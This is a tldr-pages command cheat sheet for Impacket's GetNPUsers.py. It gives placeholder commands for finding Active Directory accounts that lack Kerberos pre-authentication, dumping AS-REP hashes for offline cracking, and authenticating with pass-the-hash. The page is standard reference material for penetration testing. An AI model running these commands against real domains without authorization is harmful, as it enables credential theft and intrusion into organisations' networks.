1
0
Fork 0
mirror of https://github.com/tldr-pages/tldr.git synced 2025-07-04 13:55:23 +02:00
tldr/pages/common/getnpusers.py.md
2025-06-15 17:28:47 +02:00

25 lines
1.2 KiB
Markdown

# GetNPUsers.py
> Enumerate Active Directory accounts with Kerberos pre-authentication disabled, which may be susceptible to AS-REP roasting attacks.
> Part of the Impacket suite.
> More information: <https://github.com/fortra/impacket>.
- Enumerate users with Kerberos pre-authentication disabled (default anonymous enumeration):
`GetNPUsers.py {{domain}}/ -usersfile {{path/to/userslist}} -dc-ip {{domain_controller_ip}} -no-pass`
- Perform AS-REP roasting and dump crackable hashes for offline cracking:
`GetNPUsers.py {{domain}}/ -usersfile {{path/to/userslist}} -dc-ip {{domain_controller_ip}} -no-pass -request`
- Authenticate with valid credentials (if anonymous binding is disabled):
`GetNPUsers.py {{domain}}/{{username}}:{{password}} -usersfile {{path/to/userslist}} -dc-ip {{domain_controller_ip}}`
- Use pass-the-hash authentication instead of a password:
`GetNPUsers.py {{domain}}/{{username}} -hashes {{LM_Hash}}:{{NT_Hash}} -usersfile {{path/to/userslist}} -dc-ip {{domain_controller_ip}}`
- Save the output to a file for further analysis:
`GetNPUsers.py {{domain}}/ -usersfile {{path/to/userslist}} -dc-ip {{domain_controller_ip}} -request > {{path/to/output.txt}}`